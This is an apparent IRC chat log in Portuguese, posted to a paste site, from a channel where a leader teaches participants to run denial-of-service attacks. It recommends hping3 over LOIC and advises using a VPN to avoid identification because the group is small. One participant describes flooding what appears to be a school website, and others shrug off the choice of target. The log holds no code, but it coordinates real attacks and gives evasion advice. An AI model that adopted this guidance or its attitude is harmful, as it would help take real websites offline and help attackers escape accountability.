- <trolololguy_> disseste anteriormente q udp era mais eficaz
- <trolololguy_> podes dizer pq?
- <Marmelo> LOIC nao da no linux
- <trolololguy_> sr professor?
- <c0ldc0d3r> Grep, sim
- <c0ldc0d3r> é mais complicado
- <c0ldc0d3r> mas não recomendo loic para linux..
- <c0ldc0d3r> hping3 é mil vezes melhor
- <Kondoriano> já começou?
- <Marmelo> ah my bad pensava que o loic nao dava para o linux
- <mitsai> sim mt melhor
- <Grep> ok isso já tenho ;) como vi a falar de ligar a um irc...
- <Grep> Marmelo, dar dá... com wine :P
- <Marmelo> <trolololguy_> disseste anteriormente q udp era mais eficaz
- * Cereal_Killer (webchat@AN-opo.t9n.1tveis.IP) entrou em #aula
- <c0ldc0d3r> Caravela|Lulz, onde queres que faça paste do log?
- * emptydev- (a@AN-928.r71.7am7ru.IP) entrou em #aula
- <emptydev-> Caravela|Lulz
- <emptydev-> PVT
- * dgrdfg (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
- <emptydev-> http://pastebin.com/TfnBWewg
- <emptydev-> Vejam
- * fx (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
- <c0ldc0d3r> emptydev, boa.
- * beh (boh@AN-us8.nsn.ovi93d.IP) entrou em #aula
- * c0ldc0d3r mudou o tópico para: Aula de hoje resumida: http://pastebin.com/TfnBWewg
- <dgrdfg> estava eu dizendo que deveria haver um sitio pra podermos colocar duvidas e que deviamos elaborar uma faq
- <dgrdfg> visto que as duvidas são mais que muitas
- <c0ldc0d3r> dgrdfg, poderás colocar aqui
- <dgrdfg> e muitas questões são constantemente respondidas
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- <dgrdfg> tipo sempre o msm
- * An0nf40 (other@AN-i37.9oq.2s61dc.IP) entrou em #aula
- <beh> bem pensado
- * inetking saiu (Ping timeout: 121 seconds)
- * fx agora chama-se inetking
- <c0ldc0d3r> podem usar este canal para ajuda..
- <c0ldc0d3r> é na boa..
- <dgrdfg> c0m0 3h k x3 h@k@ u Fb| ?
- * jhNNN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
- <dgrdfg> por exemplo
- <dgrdfg> tenho uma duvida
- * emptydev saiu (Ping timeout: 121 seconds)
- * MaP05 saiu (Ping timeout: 122 seconds)
- * l4m8d4_ (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
- <dgrdfg> porque é que com algumas VPN's n consigo aceder a determinados sites
- * Funho saiu (Ping timeout: 121 seconds)
- <dgrdfg> ou servers
- <dgrdfg> e como evitar que isso aconteça
- * anarchy saiu (Ping timeout: 121 seconds)
- <Grep> c0ldc0d3r, aquele site ping.eu n é melhor o nmap ?
- * dgrdfg agora chama-se anarchy
- <c0ldc0d3r> isso tem haver com o policy que eles têm contra abusos do serviço..
- * AntiSecPT570 (webchat@AN-t76.bhi.3kcki8.IP) entrou em #aula
- <tuga> coldcoder, quanto tiveres tempo, se tiveres tempo e se fizeres o favor de me contactar, por favor contacta-me em pvt, obrigado
- <c0ldc0d3r> tens que usar outra vpn e de preferência fora da europa.
- <Made> amanha há aula?
- <anarchy> pois foi o que eu pensei
- <anarchy> há que pagar :F
- <c0ldc0d3r> Grep, o nmap verifica com o teu ip
- * VenusProject saiu (Ping timeout: 121 seconds)
- <c0ldc0d3r> o ping.eu não.
- <anarchy> mas há vpn's que têm ports fechadas?
- <c0ldc0d3r> tuga, ok
- * ruicruz saiu (Ping timeout: 127 seconds)
- * afk_johnnyPATRAODANET saiu (Ping timeout: 127 seconds)
- * kaos saiu (Quit: Page closed)
- <Grep> Grep, com o proxychains não, pois não? pelo menos pelo que li :S
- * Kondoriano saiu (Ping timeout: 129 seconds)
- * aula754 saiu (Ping timeout: 128 seconds)
- * sc0rp saiu (Ping timeout: 129 seconds)
- <c0ldc0d3r> proxychains poderá resultar...
- <c0ldc0d3r> é uma questão de verificar
- * w4r10ck saiu (Quit: )
- * Hikas saiu (Ping timeout: 132 seconds)
- * Caravela|Lulz saiu (Ping timeout: 125 seconds)
- * l4m8d4 saiu (Ping timeout: 131 seconds)
- * joao_ saiu (Ping timeout: 125 seconds)
- * Marmelo saiu (Ping timeout: 122 seconds)
- * trolololguy_ saiu (Ping timeout: 129 seconds)
- * mitsai saiu (Ping timeout: 125 seconds)
- * sh4d0wf40 saiu (Ping timeout: 157 seconds)
- * l4m8d4_ agora chama-se l4m8d4
- <Grep> tenho feito uns testes, obvio que é mais lento mas tem funcionado... mas é sempre bom haver outras soluções ;) já aprendi kk koisa
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
- <emptydev-> Tinhamos ido para a quakenet, tinhamos + gente, e ninguem caia.
- <c0ldc0d3r> emptydev-, link.
- <c0ldc0d3r> que eu dou ao caravela
- <c0ldc0d3r> para por no twitter
- <Grep> só uma questão que eu cheguei a meio da aula...
- <tuga> c0ldc0d3r, é suposto no LOIC, em baixo em attack status aparecer muitas vezes a dizer failed? pq tenho uns 32.000
- <Grep> o hping3 substitui o DoSHTTP e o Loic certo?
- <c0ldc0d3r> é, isso significa que o servidor está deixando de responder.
- <c0ldc0d3r> Grep, sim.
- <An0nf40> tuga tu estás a fazer isso com uma vpn certo?
- <tuga> nao lool
- <An0nf40> ou estás simplesmente a testar sem nada lol
- <c0ldc0d3r> vpn é necessário, visto que somos poucos..
- <tuga> mas tipo
- <c0ldc0d3r> se fosse tipo 2 mil e tal pessoas a colaborar.. era cagativo usar vpn no meio de tantos ips..
- <tuga> eu ponho em perigo outras pessoas?
- <c0ldc0d3r> mas como são poucos :\
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- <aaaamitsai> +v +o
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
- * Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- <tuga> mas eu nao testei num site do governo
- * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
- * mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
- * VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
- <An0nf40> não precisa ser do governo lol
- <mitsai> +v +o pl
- * emptydev- saiu (Ping timeout: 121 seconds)
- <An0nf40> eles dão mais importancia a esses...
- <tuga> sim, mas acho que uma escola eles nao dao importancia o.O xD
- <Grep> lol omg
- * DaGun (webchat@AN-a0h.8na.8e30u1.IP) entrou em #aula
- * An0nf40 agora chama-se sh4d0wf40
- <DaGun> boas, vao por a aula de hoje no pastebin?
- <tuga> ao desligar o ataque no LOIC o site volta imediatamente online certo?
- <DaGun> e que tava com problemas na net e perdi uma parte
- <DaGun> :S
- <sh4d0wf40> lolol
- <DaGun> xD
- <tuga> dagun, ja puseram penso eu
- <Made> DaGun http://pastebin.com/TfnBWewg]
- <DaGun> só?
- <c0ldc0d3r> tuga, sim e não.
- * LzKotha (webchat@AN-dft.gs0.hkmcdf.IP) entrou em #aula
- <c0ldc0d3r> se o impacto for muito grande.. o site poderá ficar off até haver assistência física.
- <DaGun> é que eu isso apanhei xD
- * MovingForward (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
- <tuga> ah ok
- <mitsai> +v +o pls
- <Made> Ao usar uma vpn, a vnp não fica com os meus dados no log?
- <recording inlog>
- end of file
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement